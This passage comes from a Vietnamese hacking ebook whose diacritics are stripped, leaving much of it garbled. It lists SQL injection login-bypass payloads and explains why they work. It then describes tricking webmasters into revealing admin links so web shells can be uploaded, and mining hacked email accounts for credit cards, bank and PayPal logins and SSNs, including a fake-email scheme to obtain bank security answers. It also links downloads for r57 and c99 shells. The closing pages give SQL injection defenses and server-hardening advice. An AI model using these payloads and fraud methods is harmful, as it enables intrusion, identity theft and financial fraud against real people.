Quyn truy cp Lnh (M) Miu t:U G Wr w x r - x r - x chmod 755 Dnh cho cc th mc, CGI-scripts v nhng files thc hin khcr w - r - - r - - chmod 644 Dnh cho cc files thngr w - - - - - - - chmod 600 Giu files i vi tt c ngoi tr bn v nhng scripts ca bn

U = user; G = group; W = world r = Read; w = Write; x = Execute; - = Khng c quyn

Hiu thm v By-pass login:

i khi bn truy cp vo 1 s trang no , bn s c phn ng nhp ... v bn mun ngnhp vi quyn qun tr th sao ? Ch cn bit user v pass l c th ng nhp thi ch g ?Nhng trong trng hp khngbit th sao. Vy by-pass logins gip cho bn ng nhp voni vi quyn cao nht .. c bn l vy nha. Cn y l mt s data gip bn submit xem coi n b by pass login khng:

Username

Password

' or 1=1--

' or 1=1--

" or 1=1--

" or 1=1--

or 1=1--

or 1=1--

' or 'a'='a

' or 'a'='a

Page 45" or "a"="a


46/69


" or "a"="a

') or ('a'='a') or ('a'='a

Di y l bi vit ca boyxintin Hcegroup.net:

Tm hiu thm v cng ngh mt cht.

Cc ng dng hin nay, c web application hay win application u s dng m hnh 3 lp gm :lp giao din, lp x l, lp c s d liu.- lp giao din chnh l nhng g m ngi dng nhn thy, nh mt trang web hay chng trnhyahoo cc bn c th nhn thy.- lp x l bao gm nhng on code x l nhng s kin, v d nh khi bn nhp user + passcho yahoo msg, xong nhn enter, chuyn g xy ra ? lp x l ny s thc hin cc s kin . - lp c s d liu dng lu tr thng tin, nh cc thng tin v ti khon khch hng, thngtin qun tr,...tu theo mc ch ca ng dng lm g. c s d liu c lu tr trn cc hqun tr c s d liu (Mysql, Sql server, Oradcle, MS Access...)V d :hxxp://daleosterloh.com/bug/index.php

Lc ny lp x l s thc hin cc cu truy vn n c s d liu xem thng tin bn nhp voc ng hay khng, v s thc hin cc m kch bn ca n.

Ti sao c th bypass c ? c th bypass c mt cch hon ho, trc ht xin khng nh cc bn phi hiu trong lpx l c vit nhng g ? nhng ai c qua ebook ca hieupc cng c th bit c vi tkho bypass, ttc nhng t kho do cc attacker tn cng vo h thng, xem source va ra, v cc site thng dng chung 1 source (mua t u ) nn cht l cht chm.

By gi mnh s phn tch on code trn cc bn hiu r ti sao c th bypass c nh.

Page 46


47/69


Sau khi cc lp giao din gi d liu v th phn x l ny ta c 2 bin $username +$passwordl 2 bin cha user v pass m ngi dng nhp vo

Bqua nhng thrm r, cc bn tp trung vo cu query:

select * from users where username='".$username."' and password='".$password."'

v cu if :

if($list_rows > 0){header("Location: manage.php?hcegroup=1");}else{header("Location: error.php");}

C ngha nh sau :

Query chn ra tt c thuc tnh (username, password...) t table users vi iu kinusername=user nhp, password = password nhp.

if : nu nh s lng dng tr v > 0 th cho vo, khng th t chi

n y mnh cha thy li, bi ton kh login : tm trong c s d liu c tn ti user + pass ,nu s lng ln hn 0, c ngha l tn ti, th cho vo, khng th deny. y gii thch thm ti sao dng ($list_rows > 0), thng trong database th user ch c mt,nn nu tm thy gi tr th n l 1, mt s lp trnh vin thay v vit =1 th vit thnh >0.

Vyby gi bn nhp user = abcd v password = ' or '1'='1 thay phn mu trn nh. cuquery s nh th ny :

select * users where user = 'abcd' and password ='' or '1'='1'

cu trn c hiu qu n gin, khngcn quan tm user l g, pass l g, v '1'='1' l 1 iukin hin nhin ng, nn tt c user c trong bng s c select ra, v th s lng users tmc lun ln hn 0 (tr khi trong database chng c user no). Lc ny bn qua c cu lnhif v vo c trang admin, nu cc bn hiu c nhng g mnh vit trn th y cc bn cth suy lun ra l u cn phi nht thit l '1'='1', c th l '1''0' hoc 1>0 hoc 'a' ='a hoc'a''b, min sao l 1 iu kin ng c chn vo cu query l c , nh vy c hng t cch

bypass.

Gii thch thm cho cc bn v du ' , du -- khi bypass, hi trc lc mi c mnh cng thcmc. V d by pass cng login trn bng pass : ' or '1'='1 ti sao c du ' u, ti sao cui s 1 khng c du 'hy nhn cu select : (ng quan tm n du " nh)

select * from users where user ='' and password=''

Page 47


48/69


khi user & pass ca bn a vo n c t gia 2 du '', cho nn theo ng c php cc bnphi t nh th ny:

select * from users where user ='abcd' and password='' or '1'='1'

chngqua l n ng du '' th SQL n khng nhn cc gi tr mnh a vo l chui thi.

Ngoi ra du -- dng ch thch cho 1 dng, khi bn thm du -- vo th nhng k t saun skhng cn ngha vi SQLv d pass trn mnh c th dng password : ' or '1'='1'-- .Th cu lnh th ny:

select * from users where user ='abcd' and password='' or '1'='1'--'

Lc ny du ' nm sau -- s khng cn tc dng, do cu lnh khng b li.

Page 48


49/69

III. How To Get These Important Information

1. Kim link Admin nh th no:

C mt cu chuyn khi hi l Hieupc tng nhiu ln kim link admin thng qua chat hoc giemail hi admin l link admin ca site l g?. Ci ny cc bn c tin ni khng?. S tht l cchny thnh cng y v quan trng lbn phi bit cch n ni v a ra bng chng r rng logicmt cht l ok. y l mt ln chat qua Yahoo hi xin link admin ca 1 trang web m hieupcm mm hoi khng ra link admin upload shell ln, Hieupc c c user v pass admin

thng qua li SQL Injection. Xem hnh di y bn s hiu nh:

Page 49


50/69


Cui cngth link admin ca site m Hieupc ang attackl: http://www.site.com/ecp c nhiu m ny gi au u.

Kimc ci link admin ri gi upload shell ln thi, phi mc cng i scan link ri li mmm chi cho mt. Cch ny lm tuy c phn mo him nhng quan trng l kh nng sng tologic v bnh tnh ca bn.

Lu : C gng kim c email hoc nick chat ca Webmaster hoc ngi m Design ra Webny.Nh xem mi quan h site c lin quan g n ngi mnh s lin h hi link adminnh.

Cng c ln Hieupc email hi link admin v cng thnh cng, gi kim li email show cho mi ngi xem nhng kim ny gi khng ra.

Page 50


51/69


2. Ly nhngthng tin quan trng m tacn:

Ta thng ly nhng thng tin quan trng nh: CC, hosting, bank account, accounts web,itunes, ebay, paypal..my ci ny trong email list c kh nhiu, mun kim c email list +password d nhin l bn phi hack, hack nhng dng li nh: SQL Injection. Sau y l nhngminh chng:

C ln hieupc hack c mt bank account US nhng li b hi security questions , mc d cc user v pass ca email, v email search c bui khng ra c my ci answer ca n lg. V vy Hieupc ngh ra cch l fake1 ci email vi ni dung nh sau, cc bn xem hnh ls hiu(ti gi password email ca n vn cha i, login vo email ca hn ta ri chp mtci hnh no):

Vy l cng c c ci mnhcn ri. Login vo bank account thi. Ci ny li mang tnhlogic v mt cht may mn na.

Hieupc cn mt s cch khc na nhng ch dng ti y , Hieupc tng bin mt shop CCNON thnh mt shop c FULL INFObao gm SSN, DOB, PINv c c credit card cscan qua email cng thng qua nhng th thut mang tnh logic v sng to ny . Ch gi nhvy cc bn t tm hiu, v ci ny n cng mang tnh cht phishing hay scam nhiu qu .

- Ly thng tin t Email List m bn c nh th nol tt nht. Thng th Email list ca bn csn password ca nhng email v vy bn login nhng email dng sau : gmail.com, yahoo.comv hotmail.combao gm clive.com hay msn.com. L s c th c nhng thng tin quan trngnh: CC, hosting, bank account, accounts web..

Page 51


52/69


Bn ch cn dng tnh nng search emailc sn (hu ht cc dch v email u c phn searchemail), v d nh Hieupc cn tm bank account th nhch: bank lc ny s hin ra nhiuemail c lin quan n t kho bank. T y bn s bit ch email s hu nhng bank g, sau ta c gng dng username v password ca email login nu khng thnh cng th ta li searchtip vi ch: usersau search sang: password, gm ton b username v password ra notepadsau ta th ln lt. Tng t cch lm nh vy ivi nhng thng tin m tacn nh: SSN,DOB, Paypal, Itunes (i vi PayPal khng cn bit password ca email l my k t, ta chcn login c vo email ri search ch Paypal xem th ch email cxi Paypal hay khng,nu c xi Paypal th ta tip tc search tip password ri kim ci no c password l trn 8 kt, sau cng mang vo login th xem sao)

V d minh ho v 1bank BOA m hieupc hack c c balance lun nh (v bank accounthack mi c balance cn bank reg bng fake full info th lm g c balance , ng khng n?)

Lu :Nhng file attachementdi dng file: .doc,.xls,.pdf ca ch email nhiu lc li chanhng thng tin quantrng ca h. rt nhiu ln hieupc ly c nhiu thng tin nh: CreditCard, Bank account, Passport, PayPal trong mt file attach m ch email save li trong

emailV d v mt Filedocument cha thng tinBank v CC:

Page 52


53/69


Hieupc thng checknhng email di dng @yahoo.com hack bank account v a s thnhcng rt nhiu. Trong Yahoo bn c th search File Documents rt nhanh bng cch sau,bnchuyn sang ch view: Mail Classic v sau chn My attachements l n s hin ra ngay.

Page 53


54/69


IV. Exploiting By Tool, Scripts:

1. Shell Script:

- Hin nay c rt nhiu shell script, nhng hieupc thy ch c r57.php, c99.php v kshell.aspx ltt nht.

Download b shell scripts ti y:

http://rapidshare.com/files/132986898/SQL_InjecTion___XSS_TooLz.rar

http://www.guru.net.vn/kshell_1.2.zip

2. Sau y l nhng Tools Hack m hieupc hay dng nht:

- Tool dnh cho scan: Acunetix Web Vulnerability Scanner 6, Advanced IP Scanner1.5,Network Monitor.

- Sniffer Tools: EffeTech HTTP Sniffer, Packet Sniffer, Password Sniffer, MSN Sniffer

- Tools h tr cho SQL Injection: AKD-injection 3, Absinthe 1.4.1, URLScan v3.1, Scrawlr,Microsoft Source Code Analyzer, BAKOs SQL_Injection_Scanner_v2.2, SQL INJECTORV2.0.

- Database Tools: MySQL, MSSQL Server, RazorSQL

- Tools h tr thm: ActivePerl, ActivePython, PHP, CGI, ASP, Metasploit 3, XN Hashing Tool,Putty, CuteFTP, RemoteDesktop

- Link hay v LFI v RFI:

http://www.guru.net.vn/PermaLink,guid,1924e061-6881-453d-a841-5ec94c00591f.aspx

Nhng tools trn bn c th search v download google.com.

Page 54


55/69


56/69


Cha fix (unfix):

view plainprint?

1.$id = $_GET[id];

2.mysql_query("SELECT * FROM xviet.net WHERE id=$id");

$id = $_GET[id]; @mysql_query("SELECT * FROM xviet.net WHERE id=$id");

fix (fixed):

view plainprint?

1.$id = $_GET[id];

2.mysql_query("SELECT * FROM xviet.net WHERE id=$id");

$id = $_GET[id]; @mysql_query("SELECT * FROM xviet.net WHERE id=$id");

Trong intval, intc ngha l integrals (Snguyn) cn valc ngha l value (Gi tr) v vy gitrca bin $id phi l snguyn, lm vy hacker skhng thinject hoc exploit on SQL ca

bn.

Bi vit da trn nn Anti PHP-SQL Injection vncoder.net

SQL Injection:- Hu ht cc li SQL Injection u l do cu lnh SQL sai hoc do User lm cho cu lnh SQLsai , khng thc hin ng chc nng ca n . V d nh chng ta c mt Script kim tra ngnhp nh sau :

M lnh (php)

- on Script trn l mt on Script rt n gin thc hin Login thng qua cu SQL kim trausername v password . Cu lnh SQL nguyn thy l :

Trch:

SELECT * FROM users WHERE user = "$username" AND password = "$password"

- Tuy nhin, y li l mt SQL Injection v cng ln, nu nh User nhp bin User l " OR 1OR user="

- Khi lnh SQL s tr thnh :

SELECT * FROM users WHERE user = "" OR 1 OR user="" AND password = "$password" Page 56


57/69


- Kt qu tr v s l ton b user trong Database v d nhin y l mt trng hp Login khnghp l (bin password cng c th s dng to SQL Injection) . Thc ra, li trn l do bin$username, c th fix bng cch kim tra bin user, ri sau mi kim tra bin pass, hoc mtcch nhanh hn, fix c hu ht tt c cc li SQL Injection m ch cn s dng mt hm csn ca PHP, l hm addslashes .

- Xin ni mt cht v hm addslashes: hm ny s tr v mt chui vi du \ trc cc k t cntrch dn trong Database, cc k t l " \ v NUL (\0) .

- Cu trc hm addslashes : string addslashes ( string str)

- Nh c hm addslashes m cu lnh SQL ca ta s tr thnh :

SELECT * FROM users WHERE user = "\" OR 1 OR user=\"" AND password = "$password"

-Nh vy th cu lnh SQL s hot ng ng nh chc nng ca n . Mt s li SQL Injectionkhc cng c th khc phc bng phng php ny. Ti cng xin nhc li l phng php nych fix c hu ht tt c cc li SQL Injection, tc l cc li do bin PHP gy ra, cn cc li dobn thn cu lnh SQL th cch ny khng c hiu qu g. Tuy nhin nu dng phng php ny

v cu lnh SQL chc chn th ti tin rng bn s khng cn lo lng v SQL Injection.

PHP Injection:

- Li PHP Injection thng xy ra vi cc script c File, tng tc h thng v.v. . y l mtin hnh ca PHP Injection:

M lnh (php)

Mi nhn th khng c li g, nhng nu nh v mt l do g m bin $filekhng c khaibo th y l mt li PHP Injection rt nng.- Lc ny th bin $file li c khai bo bi chnh PHP, chc nng Regiser-Global v kt qu ls a ra ni dung ca file somescript.php hay bt c File no trn h thng (k c File chaPassword nu hacker chu kh m v xem nh host ca chng ta tiu lun).

- Nu phn tch th ta s thy rng bin $file c khai bo do chc nng Register-Global(chc nng t ng ng k cc bin trong GET, POST , COOKIE v.v...), v c fix mt cch

n gin l tt chc nng ny i. Vic tt chc nng ny i cng khng nh hng g nhiu nPHP.

Cc bi tham kho thm:

Ch Safe Mode = On, bn cht v cch khc phc:

Page 57
http://forum.eda.vn/viewtopic.php?f=45&t=971#p5435http://forum.eda.vn/viewtopic.php?f=45&t=971#p5435http://forum.eda.vn/viewtopic.php?f=45&t=971#p5435http://forum.eda.vn/viewtopic.php?f=45&t=971#p5435


58/69


Safe Mode l g?

Safe Mode trong PHP (chAn ton trong PHP): mt kthut thng c Shared Hosting(Hosting Chia s) p dng tng cng bo mt (chng li cc tn cng ni b, thng cgi l Hack Local). Kthut ny khng thc shon ho mc PHP v cho n thi im hinti n vn c p dng nhiu ni. Tuy nhin, cng tht may l ktphin bn PHP 6.0 tnhnng ny sbloi bv chng ta skhng cn phi bn tm n n na.

Xc nh Safe Mode ang l On hay Off?To mt file info.php trong th mc Web ca bn vi ni dung nh sau:

Mng dn ti file info.php. VD:

http://localhost/info.phphttp://yourdomain/info.php

Tm mc "Loaded Configuration File" bit file cu hnh php.ini c t u.Tm mc "safe_mode" bit trng thi hin ti ca Safe Mode (On l bt, Off l tt)

Tt chSafe Mode?Trng hp 1: Bn c thqun l Server

Xc nh vtr file cu hnh php.ini, mfile v thit lp gi tr:safe_mode = Off

Trng hp 2: Bn khng phi l ngi qun l ServerBn c ththtt n bng 1 trong 3 cch (vi iu kin Server cho php ghi ln thit lp banu).- Cch 1 - To mt file "php.ini" th mc Web ca bn vi chth:

safe_mode = Off

- Cch 2 - To mt file ".htaccess" th mc Web ca bn vi chth:

php_flag safe_mode off

- Cch 3 - Dng hm ini_set ca PHP: t lnh sau vo file cu hnh (chng hn globals.php,configuration.php)

ini_set('safe_mode','Off');

Page 58


59/69


Bn cht ca Safe Mode:Gisbn c mt script: /home/hieupc/do_some_thing.php vi ni dung:

Vi Safe Mode = On, khi bn thc thi script do_some_thing.php trn, Server skim traOwner (chshu) ca script do_some_thing.php l ai?

VD: "hieupc" hay "apache" hay "user-xyz" no .Nu trong cng vic "job-x" c 1 php xl lin quan ti file hay th mc no (th mc/opt/lampp/tmp chng hn), m file hay th mc ny li thuc quyn shu ca 1 Owner khc),li sxy ra.

Ngoi ra khi Safe Mode = Onth c thrt nhiu hm bv hiu ha.

VD: move_uploaded_file(), mkdir()...Do vy, nu trong script *.php ca bn c sdng 1trong cc hm trn, li cng xy ra.

Danh sch cc hm bv hiu ha: http://vn2.php.net/manual/en/features.safe-mode.functions.php

Ngn chn kiu tn cng SQL Injection:

Bn mun gim thiu c hi cho nhng ktn cng khi ha m SQL nguy him vo cc gitrthng slnh.

Nhiu ng dng xy dng cc cu lnh SQL ng bng cch phn tch cc mu ri thnh mtchui ln. Cch tip cn ny pht sinh vn khi lm vic vi dliu nhphn, v cng dngln khnng mt ktn cng c ththc thi m SQL nguy him bng cch tim n vo mtgi trthng s. M nguy him ny c thc sdng can thip vo thng tin trong c sdliu hoc ngay cchy mt ng dng khc trn server. Bn c thxem mt sv dng strn cc server c sdliu ti http://www.owasp.org/asac/input_validation/sql.shtml.

ngn chn vn ny, bn nn xc nhn tnh hp lca u vo do ngi dng cung cp,kim tra rng n c kiu dliu ng nh mong mun, khng di khc thng, v.v... Cch dnht thc hin iu ny l sdng mt truy vn c-thng-s-ha.Cc truy vn c-thng-s-ha c sdng cho tt ccc li gi thtc tn tr, nhng bncng c thsdng chng vi cc lnh SQL ng. Trong trng hp thhai, bn chcn lymt lnh SQL bnh thng v thay thcc gi trng vi cc thng s(kt qustrng gingnh phn thn ca mt thtc tn trn gin). Di y l mt lnh SQL c-thng-s-ha:

INSERT INTO Shippers (CompanyName, Phone) VALUES (@CompanyName, @Phone)

Page 59


60/69


sdng lnh ny, bn cn thm cc i tng Parameter tng ng vo i tng Command(vi cc gi trph hp). Trng hp ny yu cu hai thng s(@CompanyName v @Phone).ng dng Console di y sdng truy vn c-thng-s-ha ny thm mt bn ghi mivo bng Shippers ca c sdliu Northwind.

Public Module ParameterizedQuery

Private ConnectionString As String = "Data Source=localhost;" & _

"Integrated Security=SSPI;Initial Catalog=Northwind"

Public Sub Main()

' To kt ni v cu lnh.

Dim Con As New SqlConnection(ConnectionString)

Dim UpdateSQL As String = "INSERT INTO Shippers " & _

"(CompanyName, Phone) VALUES (@CompanyName, @Phone)"

Dim Cmd As New SqlCommand(UpdateSQL, Con)

' Thm cc thng snhp.

Dim Param As SqlParameter = Cmd.Parameters.Add("@CompanyName", _

SqlDbType.NVarChar, 40)

Param.Value = "Test Company"

Param = Cmd.Parameters.Add("@Phone", SqlDbType.NVarChar, 24)

Param.Value = "(503) 555-9931"

Try

' Thc thi cu lnh.

Con.Open()

Dim Rows As Integer = Cmd.ExecuteNonQuery()

Console.WriteLine(Rows.ToString() & " row(s) affected.")

Catch Err As Exception

Console.WriteLine(Err.ToString())

Finally

Con.Close()

End Try

Console.ReadLine()

End Sub Page 60


61/69


End Module

Mt scch phng chng li SQL Injection:

Cc bn cn ch rng cc tng la lc gi thng dng khng thbo vcc bn nu btn

cng SQL Injection. Chng khng thng minh bit du hiu ca cuc tn cng v bn chtca tn cng ny l do li ca ng dng. V thchng li tn cng loi ny cn nhng k thutring bit m chyu l ti u ha ng dng bli. Ta ln lt tm hiu mt sphng php:

Hn chbpht hin li:Attacker da vo nhng li trong lp trnh ng dng tn cng v cthattacker da vo ccdu hiu pht hin ng dng bli. Vy vic lm cho cc du hiu bche i, trnn khhiu hn, hoc bin mt...c hu ht cc chuyn gia bo mt sdng. Lu l k thut ny chdng du li, cn li trn ng dng vn cn , chl chng li spht hin qu ddng li kxu khai thc.

Nhng nhng attacker khn kho vn c thnhn thu c kiu phng chng nh thny. Nc thtrnh c nhng tn cng n gin nh l thm du (du nhy) vo cui ng dn. Vphng php tm kim ng dng bli ca nhng tn cng nh thda vo nhng du hiu trvca ng dng hoc trc tip tdatabase. Ta c thcha ra nhng thng bo chung chunghoc nh hng trli trang ban u(redirect). Trong trng hp ny, cng vic tm kim li vxc nh mc tiu trnn cc kh i vi attacker.

Tuy nhin attacker lun to ra nhng cng nghtm kim li tinh vi hn, tt hn, gin tipxc nh du hiu trv. Tn cng kiu ny cn c gi l Blind SQL Injection nh ta tmhiu trn.

Phng chng tbn ngoi:Gii php ny sdng tng la c bit bo vbn khi nhng ng dng dng vic truy cpdatabase vi mc ch xu. Chng ta cn lu rng attacker tng tc vi ng dng web thngqua mt trnh duyt vi kt ni txa. Sau , ng dng gi yu cu n database. Nh vychng ta c thngn chn cc tn cng gia attacker vi ng dng, gia ng dng vi databasev ngay ctrn chnh bn thn database .

Page 61


62/69


Mt sphng php phng chng c ththc hin nh:

Nhng blc, bqut v nhng iu khin truy cp c sdliu slm cho ng dng web khbtn cng hn.

Ci thin dliu nhp vo:Cch phng chng thc schng li SQL Injection l kim tra v lm ng cc cu truy vn.Nh chng ta cp, li ny l do ng dng khng kim tra dliu nhp vo ca ngi dng.Do ngi dng c ththay i, chnh sa, tham shoc thm cmt thc thtruy vn vocu lnh. V thmi dliu nhp ca ngi dng cn c theo di v c nhng rng buc nhtnh.

Thnht, ng dng cn phn loi cc kiu dliu nhp vo. V d, nu ng dng yu cu d

liu nhp vo l kiu sth khi ng dng nhn dliu nhp vo khng nn chp nhn cc kiukhc ngoi trkiu s. Mt shm kim tra trong PHP:is_numeric($str) : kim tra $str c phi kiu shay khngis_int($str):kim tra kiu intergeris_float($str):kim tra kiu sthc...

Thhai, nu dliu nhp vo khng r kiu g th t nht cng phi xc nh nhng kiu khngc php c thc gi. Trong trng hp ny chngta sphi lc cc du nhy, lnh, cc k tc bit. Mt vi vic lc dliuc ththc hin trn ton bng dng( nh khng bao gilu dliu c du vo c sd

liu) v trn mt vi kiu dliu nhp vo( nh khng c du , trong a chmail). Page 62


63/69


VD:

magic_quotes_gpc GPC=GET,POST,COOKIE)

Hm skim tra cc dliu thuc 3 loi trn v khi pht hin c cc du '(single-quote), "(double quote),

\(backslash)th stng thm vo du\(backslash) ngay trc n:


64/69


+ CHMOD th mc l 701 v cgng ng bao giCHMOD 777, c mt sfolder khng quantrng, bn c thCHMOD 755 c thhin thng v y mt sni dung trong Folder .- Ch thny, mt sServer htrCHMOD th mc c 101, nu Server ca bn htrciny th hy sdng n, v bin php CHMOD ny rt an ton, n ngay cOwner cng khngthxem c cu trc Folder ngay ckhi vo FTP.- CHMOD File l 604 v nhrng ng bao gil 666 nu c vic cn 666 th bn CHMODtm sdng lc , sau hy CHMOD li ngay. i vi cc Server htrCHMOD file 404bn hy CHMOD nh vy.- Khng mun ai dm ng admincp ca bn, n gin l bn hy tt n i. C ch bo mt mi,da vo c tnh CHMOD ca my ch linux nh sau:Bn to 2 file, 1 file m admincp, 1 file tt admincp.

Code file m t tn l on.php:

Code file tt t tn l off.php:

Nh vy, sau khi bn ng nhp vo admincp bn cn chy link n file on.php, c nh vyadmincp mi c m --> login vo. Sau khi xong phin lm vic, bn chy link n file

off.php, admincp t ng ng.Cch ny gip chng ta tit kim thi gian, khng cn philogvo Control Panel CHMOD th mc.- Thay i cu trc, tn file mc nh c cha cc thng tin quan trng . Nu c thhy thay iccu trc CSDL nu bn lm c .- Cu hnh .htaccess cho chIp ca Admintruy cp vo admincp v admin phi dng SSHconnect v server chinh sa trn admincp.- Nu k lng hn bn c thdown file index ca admincp xung v delete file index ny trnhost i ! Khi no xi th bn up file index ny ln xi ! xi xong delete i.- Thit lp cc tng la truy cp Admin m khng sdng n CSDL, m ha User/Pass thcng tt, ngoi ra c hthng kim tra tc vca MOD, Admin ... nu quyn hn xc nhn mic thc hin (ci ny Matrix sdng rt thnh cng) . Trn y l hng dn tng bc gipcc bn cgng chng Local attack, d sao y cng chl hng dn c bn, trong qu trnhthc hin, cc bn nn linh ng hn mt cht, nu c thm tng g mi th hy cng nhautho lun. Hy vng bi vit sgip cc Admin bo mt tt hn din n ca mnh.

Ti liu tham kho thm:http://hieupc.com/joomla/bao-mat-website-joomla/134-chong-tan-cong-sql-injection.html

Preventing SQL Injections(tc gi: Anthony Ferrara - Joomla Core Team, bi gc ting Anh)

SQL Injection Page 64
http://developer.joomla.org/tutorials/33-tutorials/181-preventing-sql-injections.htmlhttp://developer.joomla.org/tutorials/33-tutorials/181-preventing-sql-injections.htmlhttp://en.wikipedia.org/wiki/SQL_injectionhttp://en.wikipedia.org/wiki/SQL_injectionhttp://en.wikipedia.org/wiki/SQL_injectionhttp://developer.joomla.org/tutorials/33-tutorials/181-preventing-sql-injections.html


65/69


2. Ngn chn LocalHack:Secure cho MySQL:

MySQL nh chng ta bit l mt DBMS rt ph bin ,chung quy chia ra lm 4 loi:* MySQL Standard includes the standard storage engine, as well as the InnoDB storage engine, which is touted as atransaction-safe, ACID-compliant database with some additional features over the standard version.* MySQL Pro is the commercial version.* MySQL Max includes the more technologically advanced features that are available during early access programs.* MySQL Classic is the standard storage engine with